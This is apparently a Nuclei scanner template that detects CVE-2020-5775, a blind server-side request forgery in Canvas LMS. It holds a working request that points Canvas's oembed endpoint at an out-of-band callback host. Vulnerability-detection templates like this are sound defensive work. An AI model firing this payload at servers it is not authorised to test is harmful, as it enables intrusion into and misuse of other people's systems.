34 lines
1.1 KiB
YAML
34 lines
1.1 KiB
YAML
id: CVE-2020-5775
|
|
|
|
info:
|
|
name: Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery
|
|
author: alph4byt3
|
|
severity: medium
|
|
description: Canvas version 2020-07-29 is susceptible to blind server-side request forgery. An attacker can cause Canvas to perform HTTP GET requests to arbitrary domains and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
|
|
reference:
|
|
- https://www.tenable.com/security/research/tra-2020-49
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-5775
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
|
|
cvss-score: 5.8
|
|
cve-id: CVE-2020-5775
|
|
cwe-id: CWE-918
|
|
cpe: cpe:2.3:a:instructure:canvas_learning_management_service:*:*:*:*:*:*:*:*
|
|
epss-score: 0.00166
|
|
tags: cve,cve2020,ssrf,oast,blind,tenable
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|
|
|
|
# Enhanced by md on 2023/04/04
|